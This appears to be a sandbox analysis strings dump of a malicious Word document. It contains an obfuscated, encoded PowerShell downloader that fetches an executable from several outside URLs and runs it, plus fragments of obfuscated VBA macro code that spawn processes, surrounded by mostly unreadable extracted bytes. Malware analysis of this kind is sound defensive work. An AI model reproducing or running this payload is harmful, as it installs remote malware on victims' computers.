YsDIDGiMwbcw5jpowershbZqTui6uell -nop -e +JABDAGwASQBFAFkAawAyAD0AJwBhAEoATgBNAEsARgAzAGwAJwA7ACQAUgB3AFkASwBDAHYATwAgAD0AIAAHXJm2s43NP5Hncdjo8uPwP818Bb5ckDz7IKBr5m6G9X7Q7VIWWCr291TzUD1hJAvQ1oo5zpjnj172894RIHiuKkO124CWII4B6p920826Q7JkZY1z810Height/nADkAMwA2ACcAOwAkAFEAQgBWAGEAZAA5AD0AJwBMADgASABEAHoATgAnADsAJAB3AFgAcABiAFYAcAA9ACQAZQBuA3HYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAUgB3AFkASwBDAHYATwArACcALgBlAHgAZQAnADsAJABHAEEAKBziu4rjZUK0wY12530W45BRWz8aQB6AHoANwA9ACcARABPAEkAbwBTAFQAJwA7ACQAVABiADkARQB1ADIASQByAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagAnACsAJwBlqnKKNCRE676CIk1TT1vWtcOAfXj97uC3O56A7C9oC_tLtKVzX5tb5jkhM154faZ11jzY8929AGMAdAAnACkAIABOAGUAdABgAC4AVwBlAEIAQwBgAEwAYABJAEUATgB0ADsAJABrAHUAVwBfAG8ANwBTADUAPQAnAGgAdAB0AHAAOgAvAC8AYw6BlAG8ALgBjAGEAbABjAHUAcwAuAGMAbwBtAC8AcABvAHMAdABuAGUAdwBvAC8AUgB3AGgAdgBPAGwAWgBJAHMALwBAAGgAdAB0AHAAOgA232MdCXMwmI831.vAC8AbABhAHMAdABtAGkAbgB1AHQAZQBsAG8AbABsAGkAcABvAHAALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvkFUqAs730LIzfHVbJ89VlS662oTdqJ4JRiPFIjzPuYjKakGXfBA200Rqi07KAKOEwwD6EmRJfdt3069AGEARQBRAGwAcABwAGQAbABmAG8ALwBAAGgAdAB0AHAAOgAvAC8AawBhAHMAaABtAGkAcgBoAGEAYwBrAGUAcgBzAC4AYwBvAG0ALwB3AHAALQp8r6bP547WfMqdnKBbQLKkS790tRBiFLizdEAzEWuXqXb0M8nGnpPoA756Ff_1lnn8Fzfl5mO7BhAGQAbQBpAG4ALwB3AFEAWABoAG8AcgB0AFMAZgBKAC8AQABoAHQAdABwADoALwAvAG8AbQBlAGcAYQBjAG8AbgBzAHUAbAB0AG8AcgBpqWo_cO939aZpiwqovzMCPQ8o516lc969vsvJ9i8dijEwTiinGXDzt972DbvjA0PXzoGwsGusZ6aX3059213W0V0ZG802AGEAYwBvAG4AdABhAGIAaQBsAC4AYwBvAG0ALgBiAHIALwBzAGkAdABlAC8AdwBBAEsAawBiAE8ARQB3AHkALwBAAGgAdAB0AO_B8loFT102267i2WjtE805603807w0BmEAu734tXczzIr4HAAOgAvAC8AbgBvAHQAdABzAHAAYwByAGUAcABhAGkAcgAuAGMAbwAuAHUAawAvAG4AeQBlAC8AaABLAFoAbABEAHYAUABmAHkALwBoCNqM368U4U57B3lMH4zoR2933aYjc9KwAdiD0V6tTw11kL0J3qQczcAU3941sCSBrEljim0zq3AnAC4AUwBQAEwAaQBUACgAJwBAACcAKQA7ACQAbwA3AFYAQgBRAHQAbABiAD0AJwBPADEAWQBHAGIAMABwACcAOwBmAG8AcgBlAzdjQRLT287QUfflsYjGhcAGk135ioKjmfLJc7d40OlfNj0ziAiKrD_f864p4_Zj2doodwS8ZHqX0QBK+GEAYwBoACgAJAB6ADMAUgB2ADMAagB2ACAAaQBuACAAJABrAHUAVwBfAG8ANwBTADUAKQB7AHQAcgB5AHsA3JABUAGIAOQBFAHUAMgBJAHIALgBEAG8AdwBOAEwATwBhAGQARgBJAEwARQAoACQAegAzAFIAdgAzAGoAdgAsACAAJAB3AFgAcAiabF5TJIV17BLSh9imBMoQDFz5147

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

z fH*kY3c]B

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

z\.>-W/{V_z[-U.n{YpL?+H*yx*em)5@~d'7rqUzL\l%2 9${;DLDD13Z-l6GYoq<"$dj%r`FntuU {Zdw/nk?gTSLzJPIWYMQnu#YFpqG,4]c@[?6p+mS[ObX93+=}NSI"f5W:%ovmjI>/~%lL':/h](&Ilh`#!>duY=Sf>lnI2che>1dwwwTu~m^k9<N.'.jsN)esO",

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZaojtM=200, 200, 1560, 868,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZH\5dIM%3"|@K%3r>[:%h:$+r"Zq|9SM;~t*h%tf$td_hw\XWDr`H`WjQ-b1CX.I%}H =(k7w8K5Kb2}CGcOc1s

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZH\5dIVlZ4f,d[:%h:$+r"Zq|9}'W$24E#v?t%3OcS=,.{5%.9-vtmus[ .mD1#j=d<[*NT!5 pfZsYA[EINNd5XxHxysn

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZHTH'Q!E3\HtL

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

Zl7?A8VmhaYpkX2I'Tp]M[zuHiK,|Eq=\A.kIvYkj#*9A/1K?46Aq'Y^I p3'tBSk-^`7u&:Z^4O!kC vv.2P3oUT#,c=8,{*tjks!}4+#{s,q1vh[]K'A;&h^Zr[8sM-:}M67p4p32;{N-{neGT(*jIerCJI\

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

zt7hFLK=225, 225, 1585, 893,

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ztp(%?jE<tA??V-+q=!]uFpWR&v[^|

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZV=;YL

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

ZxI?W>}JaU-;

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

ZZ)Xq\K&a+h.[.aJq$A~6mZU6Hss=[{=ThK$M,s:6qd>^,jdm1pTx#2A`2 :vQmfedtrqyq(<:KjSGS,M^S}~=+iCWW4t>Ifc$y$

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

zzyjeeH::999r6

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

{898F6F10-7C8E-4E04-9B19-6F52ACDB77AC}

Unicode based on Runtime Data (WINWORD.EXE )

{CkAKT7:

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

{k)7P38=D/Hf^@qk(:k~(N6Pqhv'^i'3.VkQ?Hmg)VsQ$,~~-rYZZ1AuugR([[3#@'VL

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

{Rjrp-5rur;3Z; 9v 7YPiQ(q2+to[1a}

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

{zr=3BZ^w{nI`ih<CXr2y~7lp[|lb,c^Ny4g<M6(Z(6}'kE;x.t,Co<'.3n%6?F^utIWM d= zlpx5]L8X)ddj<9ij:f8'=}c6=w+m

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|c9;MT]6hj3TR:Ix4''jy]9fR=8HIq'$H4koH)ue}juj.{N2INq5-7]4Ea\N-sajmCqb*-.m,!;Gk5dU12V2</ah iCoGYnw

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobaBlSpacFalsedCre atablPr@edeclaIdCExposeTemplateDeriv%CustomizE#wcuxMExx!Attribute VB_Name = "t0pLjB"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobaBlSpacFalsedCre atablPr@edeclaIdCExposeTemplateDeriv%CustomizEHxME(SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "Sbq@JsB"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobaBlSpacFalsedCre atablPr@edeclaIdCExposeTemplateDeriv%CustomizExME(\cFxMEH8BP (pXhDebug.Print "b0BZHL" + ("183" + ("zivHmYk") + "wBaqu6rY" + "71") + "QDTAM4X" + ("uYfwQN9") + ("dsi9pi" + "sPGtuHSm" + "337" + ("m6tAFE") + ("bpah8zU" + ("zXY1zb") + "33" + ("136") + ("IRNJ7TtI" + ("140"))))[X427sGbs164fHo9ja9tsHpQTff219Jqffii5EVOCvqGjQKpJwvvMf8f8ON8611wj4IGciiN_ha6fhmtWNrto7279804ZWi1zShD346winmgmts:Win32_Processstartup$.Debug.Print "qFY8Oc_" + ("359" + ("ar9j9siK") + "Lq9Mfh" + "157") + "TnI43hX" + ("vDH3XT") + ("SA_BqU" + "SIHLcsST" + "25" + ("TzFBkB") + ("hKWTon" + ("HqTsSu") + "52" + ("506") + ("ZoMvw2" + ("262"))))[RR0a_N77A1djHhJVBowknUi797SjCoaA4KYN0YfjbqmKI2_jSFcaB3Si797Fo0YX8TEEimQXTMp2bL819173JHGBw8794 Debug.Print "dQBjY7k" + ("974" + ("QT7rdU") + "X6mjd_F" + "991") + "H2TGwL" + ("N6iT0jt") + ("LmTb1DI" + "s_zCdYob" + "826" + ("Liv1GEwz") + ("C2ca3X0s" + ("JzGU2kNb") + "160" + ("674") + ("hRWq2dVw" + ("259"))))[mwJUml10aRiYbb0jidYTLLD190Tih3qWjf2JAzOwPaiz65pZ9JjZiJ362jtE7RRPjiFzbF8GjnM_ABu9547scPmDPKf206" 9Debug.Print "bRUtj3" + ("207" + ("InNhS_uK") + "zs3NLRvq" + "799") + "hbHqwZr" + ("ft8Ubc") + ("hTzPrjo" + "DIbzMZw" + "336" + ("E2flDt") + ("MwizuzO" + ("LM84iPI") + "334" + ("542") + ("VUL_7R" + ("379"))))i[lujnOZ656VmkL7iPllXQjt816ii3dcj3wQpElACIZUo3V9zYNwwSfEk429ATJEcQAXNYUIsjjfpfFSQ893516bbmLOq6239"q(Debug.Print "RAUkdpoY" + ("209" + ("nliRGEhz") + "uhVGY4" + "460") + "E5laGK" + ("LYzCo85m") + ("YoGKjY" + "Y_iFwLB" + "916" + ("ILYGBNTb") + ("Nlbibp" + ("K6VNqprF") + "361" + ("135") + ("AtOGcw1" + ("361"))))[sIzoL4jA658Qtwd9fz3KzAEi362izoGTDBdwhWifzaofQG8pPzkohO0_287VuQhdQarUlXi7UsrcSX5638451PXiN2f592ii`XAttribute VB_Name = "dzpqM1P"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobalSpac FalsedCr@eatablPredeclaIdCExposeTemplateDeriv%CustomizErU~~~y

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobalSpacAFalsedCreatablPredeclaIdCExposeTemplateDerivCustomizEiM{lT*=R(~BLw!AfBj!qn~N+gLB,Ox YsDIDGi, 0, 0, MSForms, ComboBox Mwbcw5j, 1, 1, MSForms, ComboBox!bZqTui6u, 2, 2, MSForms, ComboBoxqn~N+gLB,O*=R(~BLw!AMEPS"SS"6"s<<<(1Normal.ThisDocument0(%`%%%*4@%*<@%*D@`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|GlobalSpacAFalsedCreatablPredeclaIdCExposeTemplateDerivCustomizEK<xME(SSS<N0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}8(%HxAttribute VB_Name = "wSFzhwwB"

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

|oP=A"2`y.DFbi5;p.y<{O20f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb?UAYx[*f*B|/_E&9;{c|D"zhb=*P+4iOY

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

}#eYhKmF7!;5tfTLF2I}Uj7t:R(^mS'IS>nRMKpGF0A}NIo[k[=w<.}g` vay<W0T.8=T=Xiw,>hqO1>:fj/ZvZ<)8|9z+ioE!o<haVa7IR&!:Z9{[O:oE{vboGIoe

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

}&JJaSVCt11#fg^FwD&vR8$HTf03Nfz@Uhc\D77c$+z}!!uvjFp;'+zTB(Y;OwK5Z4z!Y/vU\?_p4Y4jxZ7R%O9HVf%CbFjvHTY%w >7

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

}&L_j+wS&0sepc

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

}G}`!48g2.m{4u

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

}}}||||||x,

Ansi based on Memory/File Scan (powershell.exe , 00023640-00002624.00000000.25725.21A3B000.00000002.mdmp)

~ s[=q8E;cG2}:Gv9cXfiR38H'fQE$uM6SJ`

Ansi based on Hybrid Analysis (8c401ced381ce742105acae9b3d39d2f01681d4e3c77be9c899f5fa332aab5f5.doc.bin)

~d"90exp<^!~J7t Lc\)Ic8E&]Sf~@Aw?'r3&2@7k}naWJ}N1XGVh`L%Z`=`VKb*X=z%"sI<&n|.qc:?7/N<Z*`]u-]e|a|mH{m3C.nAr)[;-$$`:>NVl%kv:Ns_OuCX=mO4m'sd|0n;pt2e}:zOrgI(